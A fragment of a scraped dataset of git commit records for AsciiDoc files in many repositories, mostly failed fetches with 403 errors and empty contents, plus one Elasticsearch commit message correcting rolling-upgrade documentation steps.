403\n","license":"mit","lang":"AsciiDoc"} {"commit":"746d5a807d92860a01c21a56fdd7674af937e745","subject":"Delete 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","message":"Delete 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e85b84f10d2589f11ab379e290417532f0d1129b","subject":"Update 2015-11-30-Getting-Google-Brillo-source-codes.adoc","message":"Update 2015-11-30-Getting-Google-Brillo-source-codes.adoc","repos":"geummo\/geummo.github.io,geummo\/geummo.github.io,geummo\/geummo.github.io","old_file":"_posts\/2015-11-30-Getting-Google-Brillo-source-codes.adoc","new_file":"_posts\/2015-11-30-Getting-Google-Brillo-source-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geummo\/geummo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8baa7c17f205bcd3c035b2e503c40cfb879b24d2","subject":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","message":"Update 2016-04-08-Redireccionamiento-invalido-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_file":"_posts\/2016-04-08-Redireccionamiento-invalido-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6183abaf5fa71ccf52c2bed39336b8248e80f8","subject":"Add initial SSL docs.","message":"Add initial SSL docs.\n","repos":"CrunchyData\/crunchy-proxy,CrunchyData\/crunchy-proxy,CrunchyData\/crunchy-proxy","old_file":"docs\/crunchy-proxy-ssl-guide.asciidoc","new_file":"docs\/crunchy-proxy-ssl-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CrunchyData\/crunchy-proxy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b0d19b294b02c33667719ef37ec258550b522a0","subject":"chore: add initial gitignore","message":"chore: add initial gitignore\n","repos":"huitparfait\/huitparfait,huitparfait\/huitparfait,huitparfait\/huitparfait","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huitparfait\/huitparfait.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b7ebf2e18fb8b8731dc31f3bf551ff80ceb84d0d","subject":"Added Camel 2.21.2 release notes to docs","message":"Added Camel 2.21.2 release notes to docs\n","repos":"onders86\/camel,cunningt\/camel,kevinearls\/camel,apache\/camel,jamesnetherton\/camel,christophd\/camel,nikhilvibhav\/camel,adessaigne\/camel,pax95\/camel,punkhorn\/camel-upstream,sverkera\/camel,christophd\/camel,jamesnetherton\/camel,davidkarlsen\/camel,tdiesler\/camel,ullgren\/camel,cunningt\/camel,nikhilvibhav\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,kevinearls\/camel,ullgren\/camel,nikhilvibhav\/camel,zregvart\/camel,CodeSmell\/camel,nicolaferraro\/camel,CodeSmell\/camel,mcollovati\/camel,objectiser\/camel,sverkera\/camel,jamesnetherton\/camel,objectiser\/camel,nicolaferraro\/camel,alvinkwekel\/camel,tdiesler\/camel,pmoerenhout\/camel,sverkera\/camel,gnodet\/camel,onders86\/camel,cunningt\/camel,DariusX\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,anoordover\/camel,alvinkwekel\/camel,alvinkwekel\/camel,tadayosi\/camel,sverkera\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,pax95\/camel,onders86\/camel,gnodet\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,gnodet\/camel,zregvart\/camel,apache\/camel,jamesnetherton\/camel,pax95\/camel,CodeSmell\/camel,pax95\/camel,kevinearls\/camel,onders86\/camel,punkhorn\/camel-upstream,ullgren\/camel,adessaigne\/camel,DariusX\/camel,davidkarlsen\/camel,nicolaferraro\/camel,objectiser\/camel,zregvart\/camel,CodeSmell\/camel,cunningt\/camel,anoordover\/camel,adessaigne\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,sverkera\/camel,mcollovati\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,anoordover\/camel,apache\/camel,Fabryprog\/camel,alvinkwekel\/camel,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,anoordover\/camel,kevinearls\/camel,punkhorn\/camel-upstream,DariusX\/camel,cunningt\/camel,mcollovati\/camel,onders86\/camel,pmoerenhout\/camel,jamesnetherton\/camel,davidkarlsen\/camel,davidkarlsen\/camel,anoordover\/camel,christophd\/camel,onders86\/camel,apache\/camel,tadayosi\/camel,sverkera\/camel,nicolaferraro\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,adessaigne\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,christophd\/camel,objectiser\/camel,pmoerenhout\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,Fabryprog\/camel,DariusX\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2212-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2212-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fe441955db22b171a75fd8322f3a25fcdc3910e","subject":"Update 2016-01-25-Puzzle-7-C-U-B-E-S.adoc","message":"Update 2016-01-25-Puzzle-7-C-U-B-E-S.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-25-Puzzle-7-C-U-B-E-S.adoc","new_file":"_posts\/2016-01-25-Puzzle-7-C-U-B-E-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b7fba3f589283a1a4165bef8b95e53def36d505","subject":"Added upgrade docs CTR","message":"Added upgrade docs CTR\n","repos":"artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,robertdale\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.4.x.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40009c0eb89dfe32142c5e3169134a60f8c48f84","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2c45ace3139caaa2343d2a6a241d1167d3097a5","subject":"Update 2015-12-13-Bai-vit-u-tien.adoc","message":"Update 2015-12-13-Bai-vit-u-tien.adoc","repos":"namlongwp\/namlongwp.github.io,namlongwp\/namlongwp.github.io,namlongwp\/namlongwp.github.io","old_file":"_posts\/2015-12-13-Bai-vit-u-tien.adoc","new_file":"_posts\/2015-12-13-Bai-vit-u-tien.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/namlongwp\/namlongwp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fd25f058b242ea6756041a7c7d84131b4983d9c","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c96505ce8584c9a1eb4085d7d61c90c4203f6ef4","subject":"Update 2015-07-22-aboutJ2Objc.adoc","message":"Update 2015-07-22-aboutJ2Objc.adoc","repos":"chakbun\/chakbun.github.io,chakbun\/chakbun.github.io,chakbun\/chakbun.github.io","old_file":"_posts\/2015-07-22-aboutJ2Objc.adoc","new_file":"_posts\/2015-07-22-aboutJ2Objc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chakbun\/chakbun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71ffa18acd6aa4db53c111b47814b955402b3e39","subject":"Update 2015-09-14-Hello-world.adoc","message":"Update 2015-09-14-Hello-world.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-Hello-world.adoc","new_file":"_posts\/2015-09-14-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e082c177d994f2f78b4ea12a1cca866cc84836a","subject":"Update 2016-05-02-Lonely-road.adoc","message":"Update 2016-05-02-Lonely-road.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-02-Lonely-road.adoc","new_file":"_posts\/2016-05-02-Lonely-road.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba9744300ff99e3f96f97e4bec64aa3ea532c35c","subject":"Deleted _posts\/2016-07-01-My-New-Blog.adoc","message":"Deleted _posts\/2016-07-01-My-New-Blog.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_file":"_posts\/2016-07-01-My-New-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bd18b34c2f00e11f18e2abea0d1e005bda41aa4","subject":"Delete the file at '_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc'","message":"Delete the file at '_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc'","repos":"twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io","old_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_file":"_posts\/2017-04-27-My-first-post-in-github-blog-using-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twentyTwo\/twentyTwo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d26ed4439a2a17b71745d7833739310d43e8bc6","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46efc0dedf7ea976e7e0952ab68e2ed8f436901f","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"341a73f6d601ec91a4b16416a09cd969701d678d","subject":"dump from riseup etherpad written in Mac lab","message":"dump from riseup etherpad written in Mac lab","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture03_20170911.adoc","new_file":"lecture03_20170911.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5ec1249e3483e5d0ed05f5365244ee5ab6495fe","subject":"Update 2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","message":"Update 2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_file":"_posts\/2015-06-26-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9994ba3310c105028f94f8e1d994f8bb21eb7599","subject":"Grafana doc: mention availability (#244)","message":"Grafana doc: mention availability (#244)\n\n","repos":"jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-clients\/grafana\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a761ab17ea9fb5079c215a1577f668f675f5e752","subject":"Update 2017-08-14-August-14-2017.adoc","message":"Update 2017-08-14-August-14-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-08-14-August-14-2017.adoc","new_file":"_posts\/2017-08-14-August-14-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93f8c26744110c947131c5b0a494882ab24e405d","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"772d7c470b1f8317e37917fa0048a625c4da285b","subject":"y2b create post Google Wireless Charging Orb!","message":"y2b create post Google Wireless Charging Orb!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-19-Google-Wireless-Charging-Orb.adoc","new_file":"_posts\/2013-02-19-Google-Wireless-Charging-Orb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28a40c0c130ed0d7007f377f8141cb12b27af219","subject":"Update 2016-06-21-Reviewing-Exception-Handling.adoc","message":"Update 2016-06-21-Reviewing-Exception-Handling.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-06-21-Reviewing-Exception-Handling.adoc","new_file":"_posts\/2016-06-21-Reviewing-Exception-Handling.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d8b7ab9772da860ffce83a076f6bab50c796a3","subject":"Docs: rolling upgrade process seems incorrect","message":"Docs: rolling upgrade process seems incorrect\n\nWhen reading the [rolling upgrade process](http:\/\/www.elasticsearch.org\/guide\/en\/elasticsearch\/reference\/current\/setup-upgrade.html#rolling-upgrades), you can see that we wrote:\n\n* disable allocation\n* upgrade node1\n* upgrade node2\n* upgrade node3\n* ...\n* enable allocation\n\nThat won't work as after a node has been removed and restarted, no shard will be allocated anymore.\nSo closing node2 and remaining nodes, won't help to serve index and search request anymore.\n\nWe should write:\n\n* disable allocation\n* upgrade node1\n* enable allocation\n* wait for shards being recovered on node1\n* disable allocation\n* upgrade node2\n* enable allocation\n* wait for shards being recovered on node2\n* disable allocation\n* upgrade node3\n* enable allocation\n* wait for shards being recovered on node3\n* disable allocation\n* ...\n* enable allocation\n\nI think this documentation update should go in 1.3, 1.4, 1.x and master branches.\n\nCloses #8218\nCloses #7973.\n","repos":"rlugojr\/elasticsearch,ThalaivaStars\/OrgRepo1,NBSW\/elasticsearch,petabytedata\/elasticsearch,Brijeshrpatel9\/elasticsearch,AleksKochev\/elasticsearch,vroyer\/elassandra,ESamir\/elasticsearch,schonfeld\/elasticsearch,nomoa\/elasticsearch,szroland\/elasticsearch,Brijeshrpatel9\/elasticsearch,wenpos\/elasticsearch,kenshin233\/elasticsearch,jpountz\/elasticsearch,JackyMai\/elasticsearch,drewr\/elasticsearch,C-Bish\/elasticsearch,HarishAtGitHub\/elasticsearch,markwalkom\/elasticsearch,schonfeld\/elasticsearch,cnfire\/elasticsearch-1,ThiagoGarciaAlves\/elasticsearch,ThalaivaStars\/OrgRepo1,F0lha\/elasticsearch,tkssharma\/elasticsearch,C-Bish\/elasticsearch,mkis-\/elasticsearch,vingupta3\/elasticsearch,yuy168\/elasticsearch,Siddartha07\/elasticsearch,golubev\/elasticsearch,girirajsharma\/elasticsearch,sposam\/elasticsearch,sarwarbhuiyan\/elasticsearch,kaneshin\/elasticsearch,elancom\/elasticsearch,jsgao0\/elasticsearch,smflorentino\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,ImpressTV\/elasticsearch,kalburgimanjunath\/elasticsearch,zeroctu\/elasticsearch,Widen\/elasticsearch,sauravmondallive\/elasticsearch,strapdata\/elassandra-test,fred84\/elasticsearch,feiqitian\/elasticsearch,Uiho\/elasticsearch,SergVro\/elasticsearch,Collaborne\/elasticsearch,lmtwga\/elasticsearch,khiraiwa\/elasticsearch,thecocce\/elasticsearch,i-am-Nathan\/elasticsearch,mapr\/elasticsearch,hydro2k\/elasticsearch,sreeramjayan\/elasticsearch,mmaracic\/elasticsearch,njlawton\/elasticsearch,episerver\/elasticsearch,jchampion\/elasticsearch,lks21c\/elasticsearch,mortonsykes\/elasticsearch,Clairebi\/ElasticsearchClone,sposam\/elasticsearch,snikch\/elasticsearch,drewr\/elasticsearch,wangyuxue\/elasticsearch,lzo\/elasticsearch-1,slavau\/elasticsearch,apepper\/elasticsearch,cnfire\/elasticsearch-1,PhaedrusTheGreek\/elasticsearch,opendatasoft\/elasticsearch,socialrank\/elasticsearch,hafkensite\/elasticsearch,hirdesh2008\/elasticsearch,feiqitian\/elasticsearch,lmtwga\/elasticsearch,iantruslove\/elasticsearch,jimczi\/elasticsearch,heng4fun\/elasticsearch,kingaj\/elasticsearch,dpursehouse\/elasticsearch,clintongormley\/elasticsearch,s1monw\/elasticsearch,andrestc\/elasticsearch,myelin\/elasticsearch,hanswang\/elasticsearch,yuy168\/elasticsearch,lmtwga\/elasticsearch,hirdesh2008\/elasticsearch,Microsoft\/elasticsearch,sarwarbhuiyan\/elasticsearch,wangtuo\/elasticsearch,apepper\/elasticsearch,s1monw\/elasticsearch,YosuaMichael\/elasticsearch,markllama\/elasticsearch,tahaemin\/elasticsearch,dylan8902\/elasticsearch,jango2015\/elasticsearch,luiseduardohdbackup\/elasticsearch,areek\/elasticsearch,elancom\/elasticsearch,beiske\/elasticsearch,loconsolutions\/elasticsearch,mjason3\/elasticsearch,cnfire\/elasticsearch-1,wayeast\/elasticsearch,ZTE-PaaS\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,Fsero\/elasticsearch,karthikjaps\/elasticsearch,jpountz\/elasticsearch,dylan8902\/elasticsearch,slavau\/elasticsearch,uschindler\/elasticsearch,alexbrasetvik\/elasticsearch,Collaborne\/elasticsearch,jw0201\/elastic,StefanGor\/elasticsearch,StefanGor\/elasticsearch,queirozfcom\/elasticsearch,kevinkluge\/elasticsearch,yuy168\/elasticsearch,tcucchietti\/elasticsearch,jimhooker2002\/elasticsearch,vroyer\/elasticassandra,F0lha\/elasticsearch,umeshdangat\/elasticsearch,kingaj\/elasticsearch,myelin\/elasticsearch,karthikjaps\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra-test,chirilo\/elasticsearch,kingaj\/elasticsearch,Shekharrajak\/elasticsearch,likaiwalkman\/elasticsearch,palecur\/elasticsearch,adrianbk\/elasticsearch,winstonewert\/elasticsearch,JSCooke\/elasticsearch,polyfractal\/elasticsearch,queirozfcom\/elasticsearch,HonzaKral\/elasticsearch,combinatorist\/elasticsearch,lightslife\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,Ansh90\/elasticsearch,liweinan0423\/elasticsearch,s1monw\/elasticsearch,VukDukic\/elasticsearch,clintongormley\/elasticsearch,Brijeshrpatel9\/elasticsearch,lydonchandra\/elasticsearch,Chhunlong\/elasticsearch,mgalushka\/elasticsearch,rlugojr\/elasticsearch,geidies\/elasticsearch,fernandozhu\/elasticsearch,queirozfcom\/elasticsearch,kaneshin\/elasticsearch,bawse\/elasticsearch,tahaemin\/elasticsearch,shreejay\/elasticsearch,rmuir\/elasticsearch,hafkensite\/elasticsearch,bestwpw\/elasticsearch,achow\/elasticsearch,dantuffery\/elasticsearch,likaiwalkman\/elasticsearch,JervyShi\/elasticsearch,martinstuga\/elasticsearch,MichaelLiZhou\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,masterweb121\/elasticsearch,likaiwalkman\/elasticsearch,himanshuag\/elasticsearch,ivansun1010\/elasticsearch,JackyMai\/elasticsearch,opendatasoft\/elasticsearch,franklanganke\/elasticsearch,mm0\/elasticsearch,pritishppai\/elasticsearch,easonC\/elasticsearch,jimhooker2002\/elasticsearch,Microsoft\/elasticsearch,sc0ttkclark\/elasticsearch,masterweb121\/elasticsearch,kevinkluge\/elasticsearch,mkis-\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,iacdingping\/elasticsearch,bawse\/elasticsearch,caengcjd\/elasticsearch,sneivandt\/elasticsearch,mkis-\/elasticsearch,linglaiyao1314\/elasticsearch,likaiwalkman\/elasticsearch,kenshin233\/elasticsearch,Fsero\/elasticsearch,davidvgalbraith\/elasticsearch,MisterAndersen\/elasticsearch,sscarduzio\/elasticsearch,adrianbk\/elasticsearch,kcompher\/elasticsearch,thecocce\/elasticsearch,kkirsche\/elasticsearch,caengcjd\/elasticsearch,camilojd\/elasticsearch,strapdata\/elassandra,henakamaMSFT\/elasticsearch,nknize\/elasticsearch,mrorii\/elasticsearch,iantruslove\/elasticsearch,mortonsykes\/elasticsearch,Shekharrajak\/elasticsearch,nrkkalyan\/elasticsearch,sauravmondallive\/elasticsearch,mnylen\/elasticsearch,myelin\/elasticsearch,nomoa\/elasticsearch,kalburgimanjunath\/elasticsearch,knight1128\/elasticsearch,Charlesdong\/elasticsearch,xuzha\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,sdauletau\/elasticsearch,18098924759\/elasticsearch,amit-shar\/elasticsearch,umeshdangat\/elasticsearch,milodky\/elasticsearch,kaneshin\/elasticsearch,HonzaKral\/elasticsearch,dongjoon-hyun\/elasticsearch,avikurapati\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,phani546\/elasticsearch,vrkansagara\/elasticsearch,HarishAtGitHub\/elasticsearch,lightslife\/elasticsearch,ulkas\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,vingupta3\/elasticsearch,mjhennig\/elasticsearch,18098924759\/elasticsearch,slavau\/elasticsearch,MjAbuz\/elasticsearch,kkirsche\/elasticsearch,bestwpw\/elasticsearch,rento19962\/elasticsearch,MichaelLiZhou\/elasticsearch,kkirsche\/elasticsearch,tebriel\/elasticsearch,iacdingping\/elasticsearch,btiernay\/elasticsearch,smflorentino\/elasticsearch,mrorii\/elasticsearch,truemped\/elasticsearch,milodky\/elasticsearch,SergVro\/elasticsearch,areek\/elasticsearch,jaynblue\/elasticsearch,lchennup\/elasticsearch,mikemccand\/elasticsearch,ImpressTV\/elasticsearch,xpandan\/elasticsearch,ZTE-PaaS\/elasticsearch,tahaemin\/elasticsearch,VukDukic\/elasticsearch,palecur\/elasticsearch,karthikjaps\/elasticsearch,masterweb121\/elasticsearch,petabytedata\/elasticsearch,wenpos\/elasticsearch,koxa29\/elasticsearch,hanswang\/elasticsearch,polyfractal\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra-test,coding0011\/elasticsearch,Ansh90\/elasticsearch,markwalkom\/elasticsearch,wuranbo\/elasticsearch,mortonsykes\/elasticsearch,socialrank\/elasticsearch,kenshin233\/elasticsearch,davidvgalbraith\/elasticsearch,yanjunh\/elasticsearch,MjAbuz\/elasticsearch,strapdata\/elassandra5-rc,geidies\/elasticsearch,lchennup\/elasticsearch,sjohnr\/elasticsearch,hydro2k\/elasticsearch,scorpionvicky\/elasticsearch,bestwpw\/elasticsearch,qwerty4030\/elasticsearch,nellicus\/elasticsearch,episerver\/elasticsearch,kcompher\/elasticsearch,jbertouch\/elasticsearch,hechunwen\/elasticsearch,onegambler\/elasticsearch,henakamaMSFT\/elasticsearch,feiqitian\/elasticsearch,xingguang2013\/elasticsearch,TonyChai24\/ESSource,rento19962\/elasticsearch,codebunt\/e